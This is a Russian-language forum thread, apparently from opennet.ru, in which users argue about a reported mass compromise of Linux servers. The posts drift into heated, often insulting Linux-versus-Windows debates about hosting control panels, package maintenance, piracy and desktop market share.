Ответить | Правка | ^ к родителю #326 | Наверх | Cообщить модератору

393. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 22:00 
> А какие гарантии дает Патрегх ? :-) Я сам, допустим, сейчас пишу
> из под нее же. Бздю то за что пнул ? :-)

А чем они такие из себя неприкасаемые? В общем то в плане гарантий все одинаковы: пишут AS IS и все такое :)


Ответить | Правка | ^ к родителю #330 | Наверх | Cообщить модератору

402. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от ZloySergant (ok) on 19-Фев-13, 22:23 
>> Не, я, понятно, для работы Слаку использую давно уже. Многа лет, можно
>> сказать. С тех пор что, Мелкомягкие там, Ябблы всякие, Бзди разные,
>> какие-то гарантии работоспособности своей системы давать начали???
> А какие гарантии дает Патрегх ? :-) Я сам, допустим, сейчас пишу
> из под нее же. Бздю то за что пнул ? :-)

Вот об том и речь - никто никаких гарантий не дает. А то сообщение за нумером 243 (показать пальцем чье? :) ) вообще-то читается, что "винда" дает какие-то гарантии. А если такого преимущества нет, то на кой хрен она нужна, с учетом, что платная, чай не бухгалтера?

З.Ы. Бздю пнул до кучи, шоб никому обидно не было.

Ответить | Правка | ^ к родителю #330 | Наверх | Cообщить модератору

361. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от none_first (ok) on 19-Фев-13, 21:14 
>Она и "без ядра" уделывает линапс на декстопах как котенка :-)
>А что, линус или GPL выдают гарантию ? :-)

Она и "без ядра" уделывает линапс/она чуть что - уделывается; fixed
а что деньги давать без гарантии нынче модно? - так обычно при грабежах принято ;)

Ответить | Правка | ^ к родителю #243 | Наверх | Cообщить модератору

383. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 21:38 
> Она и "без ядра" уделывает линапс/она чуть что - уделывается; fixed
> а что деньги давать без гарантии нынче модно? - так обычно при
> грабежах принято ;)

Сходи на форумы бубунтоидов или арчеводов - услышишь много интересного :-)


Ответить | Правка | ^ к родителю #361 | Наверх | Cообщить модератору

581. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 23:48 
> Сходи на форумы бyбyнтоидов или арчеводов - услышишь много интересного :-)

Не помню чтобы за арч или убунту денег требовали. А вот если ты винду себе бесплатно поставишь - тебя пиратом обзовут и вообще, спасибо если не линчуют. Не говоря уж о том тчо даже кастомизированная сборка под свои нужды - это уже грубое нарушение EULA. Во пипец. Получается что у перечисленных система не только дешевле ($0) но и условия лицензирования явно лучше.

Ответить | Правка | ^ к родителю #383 | Наверх | Cообщить модератору

583. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от SergMarkov email(ok) on 20-Фев-13, 23:53 
> Не помню чтобы за арч или убунту денег требовали. А вот если
> ты винду себе бесплатно поставишь - тебя пиратом обзовут и вообще,
> спасибо если не линчуют. Не говоря уж о том тчо даже
> кастомизированная сборка под свои нужды - это уже грубое нарушение EULA.
> Во пипец. Получается что у перечисленных система не только дешевле ($0)
> но и условия лицензирования явно лучше.

Если все так хорошо, по почему у нее только 1% десктопа ?


Ответить | Правка | ^ к родителю #581 | Наверх | Cообщить модератору

593. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от бедный буратино (ok) on 21-Фев-13, 00:29 
> Если все так хорошо, по почему у нее только 1% десктопа ?

Если умным быть несоизмеримо лучше, то почему вы все такие тупые?

Ответить | Правка | ^ к родителю #583 | Наверх | Cообщить модератору

643. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Аноним (??) on 21-Фев-13, 15:46 
> Если все так хорошо, по почему у нее только 1% десктопа ?

Наверное потому что кое-кто вовремя подсуетился и подмял под себя OEMов. Тем не менее, эта пирамида начинает разваливаться, т.к. основное рубилово бабла теперь не там, а в мобильном сегменте MS вообще ноль без палочки. А ОЕМы таки хотят бабла. MS им этого обеспечить не может, по поводу чего их влияние на отрасль стремительно падает.


Ответить | Правка | ^ к родителю #583 | Наверх | Cообщить модератору

645. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от SergMarkov email(ok) on 21-Фев-13, 15:52 
> Наверное потому что кое-кто вовремя подсуетился и подмял под себя OEMов. Тем
> не менее, эта пирамида начинает разваливаться, т.к. основное рубилово бабла теперь
> не там, а в мобильном сегменте MS вообще ноль без палочки.
> А ОЕМы таки хотят бабла. MS им этого обеспечить не может,
> по поводу чего их влияние на отрасль стремительно падает.

Десктопы никуда не денутся, несмотря на очередные похороны. Работать на планшетниках просто тупо неудобно.
Что же касается отставания мелкософта в мобильном сегменте, она изначально,начиная еще с екселя для маков, отставала, а потом как то набирала очки. Что не станет безоговорочным лидером в мобильном сегменте, так времена уже несколько другие, но и ставить на ней крест еще рановато.


Ответить | Правка | ^ к родителю #643 | Наверх | Cообщить модератору

717. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от тигар (ok) on 23-Фев-13, 13:21 
вот и выросло очередное поколение школоты, которая шиндошс хоронит. лол
Ответить | Правка | ^ к родителю #643 | Наверх | Cообщить модератору

719. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Michael Shigorin email(ok) on 23-Фев-13, 13:26 
> вот и выросло очередное поколение школоты, которая шиндошс хоронит. лол

Вы в своём праве держать разлагающийся труп в доме, а мы уж по старинке.

Ответить | Правка | ^ к родителю #717 | Наверх | Cообщить модератору

720. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от arisu (ok) on 23-Фев-13, 13:28 
так это ж бсдшник, им не привыкать.
Ответить | Правка | ^ к родителю #719 | Наверх | Cообщить модератору

242. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 18:00 
> А патаму шта под линапс нормального софта нет, подо что кейгены то делать ? :-)

Если убрать все промежуточные сообщения, получится, что товарищ спорит сам с собой. Бывают "без царя в голове", а эти "с баллмером в голове", и крышу сносит начисто.


Ответить | Правка | ^ к родителю #228 | Наверх | Cообщить модератору

365. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от none_first (ok) on 19-Фев-13, 21:19 
>> угу именно поэтому большинство вареза и кейгенов именно для винды :)
>> это наверное покупалка не выросла? ;)
> А патаму шта под линапс нормального софта нет, подо что кейгены то
> делать ? :-)

как-то это не соответствует нормальности, честности, элитности...
а скорее доказывает (практически) - масса людей пользующих винду - готовы украсть, обмануть, переложить расходы на других (цена винды, на компах фирмы так или иначе включена в цену товара)
и оправдывать это наличием софта - жалкая отмазка
"нормального софта" - это типа п..женый? - я правильно понял?

Ответить | Правка | ^ к родителю #228 | Наверх | Cообщить модератору

367. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –4 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 21:21 
Это в России делают, и то далеко не все. Всё больше теперь покупают просто потому что так проще и надежнее. А "элитность" вообще налево и за угол :-)
Ответить | Правка | ^ к родителю #365 | Наверх | Cообщить модератору

369. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от none_first (ok) on 19-Фев-13, 21:23 
> Это в России делают, и то далеко не все. Всё больше теперь
> покупают просто потому что так проще и надежнее. А "элитность" вообще
> налево и за угол :-)

просто так проще... потреблять и надежней... ничего не производить ;)

Ответить | Правка | ^ к родителю #367 | Наверх | Cообщить модератору

377. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 21:32 
> просто так проще... потреблять и надежней... ничего не производить ;)

Вот ты тыж ежж :-) По моим наблюдениям больше всего о "философии линукса и СПО" разоряются те, кто тупо ставит старье их реп, приготовленное косорукими майтейнерами :-)


Ответить | Правка | ^ к родителю #369 | Наверх | Cообщить модератору

394. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 22:01 
> приготовленное косорукими майтейнерами :-)

А судьи кто?

Ответить | Правка | ^ к родителю #377 | Наверх | Cообщить модератору

423. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от SergMarkov email(ok) on 20-Фев-13, 00:00 
> А судьи кто?

Я когда портрировал portage c примочками на слаку, полез проверять что я же там получил. Ёё.. мой любимый worker годичной давности, многое остальное такой же степени свежести. Не говоря уже про то что worker собран криво.


Ответить | Правка | ^ к родителю #394 | Наверх | Cообщить модератору

353. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 21:02 
Даже среди вендузятников не встречал таких идиотов, которые дошли до того, что стали-бы покупать проприетарный софт.
Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

357. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 21:10 
> Даже среди вендузятников не встречал таких идиотов, которые дошли до того, что
> стали-бы покупать проприетарный софт.

"У каждого своя компания" © :-) Знакомые вендузятники его именно покупают, от самой венды и офиса до других прог. Поверь "так проще жить" :-)


Ответить | Правка | ^ к родителю #353 | Наверх | Cообщить модератору

371. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от none_first (ok) on 19-Фев-13, 21:25 
>> Даже среди вендузятников не встречал таких идиотов, которые дошли до того, что
>> стали-бы покупать проприетарный софт.
> "У каждого своя компания" © :-) Знакомые вендузятники его именно покупают, от
> самой венды и офиса до других прог. Поверь "так проще жить"
> :-)

покупать на свои или за чужие?
если фирма - за чужие, сверх прибыль - можно бездарно тратить

Ответить | Правка | ^ к родителю #357 | Наверх | Cообщить модератору

373. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 21:27 
Да нет, для себя Это не нищеброды с репами, в которых старье и косорукие майтнейнеры :-)
Ответить | Правка | ^ к родителю #371 | Наверх | Cообщить модератору

395. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Аноним (??) on 19-Фев-13, 22:02 
> Да нет, для себя Это не нищеброды с репами, в которых старье и косорукие майтнейнеры :-)

Какой бездарный и жирный троллинг. Смотрим, найдется ли хоть 1 идиот который на него купится.

Ответить | Правка | ^ к родителю #373 | Наверх | Cообщить модератору

579. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 20-Фев-13, 23:13 
>> Да нет, для себя Это не нищеброды с репами, в которых старье и косорукие майтнейнеры :-)
> Какой бездарный и жирный троллинг. Смотрим, найдется ли хоть 1 идиот который
> на него купится.

а он нашелся! в #395 же;-)

Ответить | Правка | ^ к родителю #395 | Наверх | Cообщить модератору

264. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +5 +/
Сообщение от Клыкастый (ok) on 19-Фев-13, 18:18 
> только вантузячнеки

поломали линукс, но обязательно надо упомянуть венду. поломали линукс, но обязательно надо упомянуть фрю. обязательно пните iOS и ещё что нибудь, не имеющее к теме никакого отношения. упоминайте громче и чаще - возможно уязвимость после этого зарастёт и рассосётся.

Хотя по факту вопли эти они прекрасны. обычный дискурс "мы лучше всех" подменяется "мы не хуже остальных".

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

268. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 18:24 
>> только вантузячнеки
> поломали линукс, но обязательно надо упомянуть венду

Не венду, а вендузятников.


> Хотя по факту вопли эти они прекрасны. обычный дискурс "мы лучше всех" подменяется "мы не хуже остальных".

Не спрашивай, по ком звонит колокол. Спроси лучше, почему эти альтернативно развитые вообще на опеннете. Какими бы "благовидными" причинами они свои сублимации не скрывали, факт остаётся фактом, это их тянет на опеннет. А их отговорки обычно разделяются на демонстрирующие какую-то болезненную неполноценность и просто нелепые.

Если кто-то тратит своё время, пытаясь обидеть свободное - это признание. И чем громче и нелепее вопли прибывающих, тем сильнее признание.

Ответить | Правка | ^ к родителю #264 | Наверх | Cообщить модератору

278. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Клыкастый (ok) on 19-Фев-13, 18:43 
> Спроси лучше, почему эти альтернативно развитые вообще на опеннете.

Постановка вопроса "что вы делаете в нашем районе" не самая лучшая. Гораздо интереснее: "как вы себя ведёте", но тут же выяснится, что долб*бов с "правильной линукс-ориентацией" как минимум никак не меньше. И всё бы ничего, но опенсорс это не только линукс.

> Если кто-то тратит своё время, пытаясь обидеть свободное - это признание.

(задумался о спорах GPL vs BSD, GPL vs all) хорошо бы, чтобы вы полностью осознали вами сказанное.

Ответить | Правка | ^ к родителю #268 | Наверх | Cообщить модератору

313. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 19:33 
> упоминайте громче и чаще - возможно уязвимость после этого зарастёт и рассoсётся.

Для начала надо бы определить что уязвимость вообще именно в линуксе. А не в либах, черти-каком софте и прочая.

> подменяется "мы не хуже остальных".

Ну как бы идеализировать секурность любой системы вредно. Ведет к тому что потом при первом же взломе все дружно припоминают. С файрфоксом когда-то была такая история. Перцы пиарились что мол, секурнее, блaбла. А как пришла популярность и дыры стали чинить - как-то пришлось забыть об этом. Что не отменяет того факта что граждане платят за поиск дыр + довольно оперативно фиксят их. Так что общая секурность намного лучше того же IE, например. Сугубо глядя на массовые поимения через второй и отсутствие таковых через первый.

Ответить | Правка | ^ к родителю #264 | Наверх | Cообщить модератору

417. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от maks_s email on 19-Фев-13, 23:10 
> пропиретарщики подождут немного, а потом массово начнут нагибать кулхацкеров и их
> "клиентов", выставляя счета. вот где много попкорна понадобится.
> такая вот селяви, просто жуть

Данные о пользователе и данные о корректности установленных ключей это трохи разные вещи, не? Нарушения приватности есть только в первом случае.

И вообще, за счет пиратских вендов и офисов МС стал де-факто стандартом в госструктурах РФ, и сейчас стрижет бабло, продавая их дела пачками в разбогатевшие министерства и ведомства. Так что тут ВНЕЗАПНО В КАНДАЛЫ не будет

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

13. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от admriddler email on 19-Фев-13, 14:23 
Указанные панели доставляют или собирают из исходников кучу всякого барахла, еще не понятно
виноват ли RHEL/CentOS.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

19. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +14 +/
Сообщение от б.б. on 19-Фев-13, 14:29 
> Указанные панели доставляют или собирают из исходников кучу всякого барахла, еще не
> понятно виноват ли RHEL/CentOS.

А это культура такая. Если условный Вася, который тут вечно хает свободное и признаётся в поклонении проприетарному, завтра подхватит на Linux проблему через закладку в проприетарной игре, виноват будет Linux.

Можно иметь 99.99% защищённых пакетов, и огромный вход в стене - и тогда защищённость остальных 99.99% пакетов не будет иметь никакого смысла.


Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

634. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Пр0х0жий (ok) on 21-Фев-13, 14:11 
> Можно иметь 99.99% защищённых пакетов, ...

И нетадмин из Хорватии это подтверждает:
http://www.webhostingtalk.com/showpost.php?p=8566821&postcou...

Вывод:
Использование проприетарного клозет-source шлака дело геморное и непредсказуемое.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

636. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от бедный буратино (ok) on 21-Фев-13, 14:15 
>> Можно иметь 99.99% защищённых пакетов, ...
> И нетадмин из Хорватии это подтверждает:
> http://www.webhostingtalk.com/showpost.php?p=8566821&postcou...

Кикимор я не понимаю. Что там, чем всё кончилось, они поженились?

Ответить | Правка | ^ к родителю #634 | Наверх | Cообщить модератору

48. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от linux must _RIP_ on 19-Фев-13, 15:04 
> Указанные панели доставляют или собирают из исходников кучу всякого барахла, еще не
> понятно
> виноват ли RHEL/CentOS.

к сожалению они не готовы отвечать за кучу левых маинтейнеров - которые ломают зависимости между пакетами. И поддерживать весь этот зоопарк. Гораздо проще ставить свои пакеты, и их поддерживать.

Ну что ж - это обратная сторона "многосторонности" и "разнообразия" в linux.
Кушайте...

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

54. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:10 
Хотите сказать, что в RHEL чаще ломают совместимость, чем в CPanel?
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

199. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от linux must _RIP_ on 19-Фев-13, 17:24 
я хочу сказать что cPannel  подерживает не только RHEL, а еще SLES, Debian и прочие.
Посему для них значительно проще - иметь одну пакетную базу на весь этот зоопарк.
И это не считая всяких RedHat клонов,: какждый из которых наровит собрать иначе и получается что разные зависимости и разные версии. Головняк с поддержкой этого зоопарка понятен ?
Или опять - "у меня на localhost все клева".
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

200. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:26 
> Головняк с поддержкой этого зоопарка понятен ?

Нет.


Ответить | Правка | ^ к родителю #199 | Наверх | Cообщить модератору

208. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от none_first (ok) on 19-Фев-13, 17:35 
а pappet (и не только) тоже кучу всего поддерживает и чё?
и с успехом м.б. использован для управления парком серверов...
Ответить | Правка | ^ к родителю #199 | Наверх | Cообщить модератору

252. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 18:07 
> я хочу сказать что cPannel  подерживает не только RHEL, а еще
> SLES, Debian и прочие.
> Посему для них значительно проще - иметь одну пакетную базу на весь
> этот зоопарк.
> И это не считая всяких RedHat клонов,: какждый из которых наровит собрать
> иначе и получается что разные зависимости и разные версии. Головняк с
> поддержкой этого зоопарка понятен ?
> Или опять - "у меня на localhost все клева".

Взять, к примеру, DirectAdmin , который тянет с собой кучу г., но тянет он все это через sh скрипты, которые элементарно правятся. В итоге: один раз разобрался, переписал и теперь все новые сервера ставятся не с самосбором от DirectAdmin-овцев.
Это я к тому, что: кто хочет, тот сделает, это касается и DirectAdmin-овцев и админов.
Кстати ISPmanager не стремается использоваться ту пакетную систему, что принята в конкретном дистрибутиве/ОС.

Ответить | Правка | ^ к родителю #199 | Наверх | Cообщить модератору

459. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 08:14 
>[оверквотинг удален]
>> поддержкой этого зоопарка понятен ?
>> Или опять - "у меня на localhost все клева".
> Взять, к примеру, DirectAdmin , который тянет с собой кучу г., но
> тянет он все это через sh скрипты, которые элементарно правятся. В
> итоге: один раз разобрался, переписал и теперь все новые сервера ставятся
> не с самосбором от DirectAdmin-овцев.
> Это я к тому, что: кто хочет, тот сделает, это касается и
> DirectAdmin-овцев и админов.
> Кстати ISPmanager не стремается использоваться ту пакетную систему, что принята в конкретном
> дистрибутиве/ОС.

потом выяснилось что в твоих любимых версиях не такой формат конфига - и привет...

Ответить | Правка | ^ к родителю #252 | Наверх | Cообщить модератору

473. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 11:49 
> потом выяснилось что в твоих любимых версиях не такой формат конфига -
> и привет...

Вот уже пять лет выясняется и все выяснится не может.

Ответить | Правка | ^ к родителю #459 | Наверх | Cообщить модератору

490. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 13:20 
>> потом выяснилось что в твоих любимых версиях не такой формат конфига -
>> и привет...
> Вот уже пять лет выясняется и все выяснится не может.

ты 5 лет не ставиш новый софт и сам следишь за обновлениями безопасности ? мне тебя жалко :-)

Ответить | Правка | ^ к родителю #473 | Наверх | Cообщить модератору

582. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 23:52 
Бедный солярочник, так соляркой^W батхертом истекает. Даже ник с досады нацепил и ср@т в каждой ветке про линукс. Только соляре вот все это уже не поможет - скажи спасибо своему ораклю за это. Их эффективные манагеры явно застряли в прошлом веке в своих понятиях о жизни.
Ответить | Правка | ^ к родителю #490 | Наверх | Cообщить модератору

57. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Anonym on 19-Фев-13, 15:11 
>>к сожалению они не готовы отвечать за кучу левых маинтейнеров - которые ломают зависимости между пакетами. И поддерживать весь этот зоопарк. Гораздо проще ставить свои пакеты, и их поддерживать.

IMHO проблема как раз таки RHEL/CentOS, потому что с пакетами, идущими в стандартной поставке этих систем (особенно версии 5.x) в любом случае приходится подключать сторонние репозитории или собирать свои рпмки, сорцы которых таки качаются со сторонних ресурсов.

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

62. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:14 
> Ну что ж - это обратная сторона "многосторонности" и "разнообразия" в linux.
> Кушайте...

Это обратная сторона безграмотности. И я бы не прочь, чтобы они и не приближались к свободному ПО.

А по факту получается, что они создают проблемы только сами себе и тем, кого удалось зацепить, а нормальных людей это вообще никак не касается, потому что они в здравом уме себе такое не поставят.


ps. Скачал дерево pkgsrc, собрал пакет для netbsd i386, оттуда же собрал пакет для wheezy amd64. Работает, и не ругается на какие-то несовместимости. Так что даже между ОС есть переносимость, и между архитектурами.

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

299. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Клыкастый (ok) on 19-Фев-13, 19:10 
> ps. Скачал дерево pkgsrc, собрал пакет для netbsd i386, оттуда же собрал
> пакет для wheezy amd64. Работает, и не ругается на какие-то несовместимости.
> Так что даже между ОС есть переносимость, и между архитектурами.

собственно поэтому меня радуют гибридные дистры: ядро BSD окружение linux и наоборот - на выходе патчи про совместимость. всё же сила *nix в сочетании единства и многообразия.

Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

87. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Аноним (??) on 19-Фев-13, 15:30 
> Ну что ж - это обратная сторона "многосторонности" и "разнообразия" в linux.
> Кушайте...

Ну вон в виндоусе нет никакого разнообраизя. Что не мешает хакерью его долбать. Вплоть до remote kernelmode через закрытые (!!!) udp порты который не так давно починили. Так что ваш тезис выглядит, кхм, несколько притянутым за уши. Ну вон винде же это не помогло почему-то.

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

91. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от клоун Стаканчик on 19-Фев-13, 15:34 
А что, кто-то уже взломал? Там нужно было отправить 2^32 пакетов на неиспользуемый порт, явно разрешённый администратором, но никем не используемый.
Ответить | Правка | ^ к родителю #87 | Наверх | Cообщить модератору

142. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:24 
> А что, кто-то уже взломал?

Судя по тому что постоянно прорва спама и сотни тысяч хостов в ботнетах - это вообще перманентное состояние виндов.

>  Там нужно было отправить 2^32 пакетов на неиспользуемый порт

У автоматических троянов времени и траффика много, они же не за свой счет пашут. Вон мсбласт летал путем тупого сканирования диапазонов айпишников, ему хватало.

Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

213. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:38 
> В венде программ намного больше чем в линапсе

семьдесят два миллиона троянов. linux завидует стоя.

Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору
Часть нити удалена модератором

221. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:45 
> В линапс пришли игры, а где игры там и трояны.

Не знаю, дадут ли мне премию, или придётся язык показывать, но я, кажется, понял.


Когда тупость умножают на бесконечность, получается виндузятник.

Ответить | Правка | ^ к родителю #459 | Наверх | Cообщить модератору
Часть нити удалена модератором

324. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:42 
> Когда задротство умножают на кривые руки получаются линyпcятник :-)

А вы получаетесь трололо. При том довольно жирным. А кто на такой троллинг ведется - тот лол.

Ответить | Правка | ^ к родителю #490 | Наверх | Cообщить модератору

419. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Michael Shigorin email(ok) on 19-Фев-13, 23:14 
> А вы получаетесь трололо. При том довольно жирным.

Да оставьте уже пенсионера в покое -- может, давление за бортом штормит, вот его и плющит.

Ответить | Правка | ^ к родителю #324 | Наверх | Cообщить модератору

426. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 20-Фев-13, 00:25 
>> А вы получаетесь трололо. При том довольно жирным.
> Да оставьте уже пенсионера в покое -- может, давление за бортом штормит,
> вот его и плющит.

Мне до пенсии не далеко но и не так уж и близко :-)


Ответить | Правка | ^ к родителю #419 | Наверх | Cообщить модератору

430. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Led (ok) on 20-Фев-13, 01:18 
>>> А вы получаетесь трололо. При том довольно жирным.
>> Да оставьте уже пенсионера в покое -- может, давление за бортом штормит,
>> вот его и плющит.
> Мне до пенсии не далеко но и не так уж и близко

Иногда маразм приходит ещё до пенсии, иногда он врождённый. так что твой случай не такой уж и уникальный.

Ответить | Правка | ^ к родителю #426 | Наверх | Cообщить модератору

431. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от SergMarkov email(ok) on 20-Фев-13, 01:23 
> Иногда маразм приходит ещё до пенсии, иногда он врождённый. так что твой
> случай не такой уж и уникальный.

Я уже много раз говорил простую вещь, которая давно известна социологам - в маргинальных группировках типа линуксовой непропорционально большой процент социопатов и полировщиков пупка :-)


Ответить | Правка | ^ к родителю #430 | Наверх | Cообщить модератору

436. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 03:03 
>> Иногда маразм приходит ещё до пенсии, иногда он врождённый. так что твой
>> случай не такой уж и уникальный.
> Я уже много раз говорил простую вещь, которая давно известна социологам -
> в маргинальных группировках типа линуксовой непропорционально большой процент социопатов
> и полировщиков пупка :-)

Потому что они лучшие, в отличии от серой массы быдла.

Ответить | Правка | ^ к родителю #431 | Наверх | Cообщить модератору

438. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 03:14 
> Потому что они лучшие, в отличии от серой массы быдла.

Скорее потому, что есть реальная возможность заглянуть к разработчикам. Причём, скорее всего, это общий срез всех разработчиков, но... проприетарщину выпускает лейбл, где миллионы вбуханы в то, чтобы поверх этого создать глянец (только уши иногда торчат), а в открытых проектах всё честно: вот разработчик, а вот его проект.

Кроме того, тогда было бы непонятно, как эти люди умудряются договариваться, взаимодействовать, работать сообща? :) По подвалам сидят как раз проприетарные разработчики, причём продавцам практически всё равно, что они напишут - они и так продадут, а обратной связи нет никакой, поэтому не разработчики исполняют потребности пользователей, а пользователи исполняют потребности продавцов. :)

Кто-нибудь вообще хоть раз мог предъявить претензию разработчику Windows или msOffice? Где они? В каких подвалах? :)

Ответить | Правка | ^ к родителю #436 | Наверх | Cообщить модератору

449. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 20-Фев-13, 06:18 
> Кто-нибудь вообще хоть раз мог предъявить претензию разработчику Windows или msOffice?
> Где они? В каких подвалах? :)

Открой usenet а в нем группы мелкософта. Там довольно часто мелькают работники службы то ли поддержки то ли еще какой.

Ответить | Правка | ^ к родителю #438 | Наверх | Cообщить модератору

447. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от SergMarkov email(ok) on 20-Фев-13, 06:15 
> Потому что они лучшие, в отличии от серой массы быдла.

Это совершенно стандартное их оправдание :-) Употребление словечка "быдло" это своего рода неопровергаемый критерий принадлежности к "небыдлу" (тм) , а это уже такая хрень, что о ней и вовсе неинтересно говорить


Ответить | Правка | ^ к родителю #436 | Наверх | Cообщить модератору

584. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 23:55 
> в маргинальных группировках типа линуксовой непропорционально большой процент социопатов
> и полировщиков пупка :-)

Вот я и думаю - в каую из этих категорий вас записать? Кажется, сразу в обе? А то поразвели какого-то тупого да еще и жирного троллинга к тому же на весь форум. Ну чем не социопатия и полировка пупка?

Ответить | Правка | ^ к родителю #431 | Наверх | Cообщить модератору

589. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 21-Фев-13, 00:08 
> Вот я и думаю - в каую из этих категорий вас записать?
> Кажется, сразу в обе? А то поразвели какого-то тупого да еще
> и жирного троллинга к тому же на весь форум. Ну чем
> не социопатия и полировка пупка?

Записывайте в какую больше нравится :-)

Ответить | Правка | ^ к родителю #584 | Наверх | Cообщить модератору

644. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
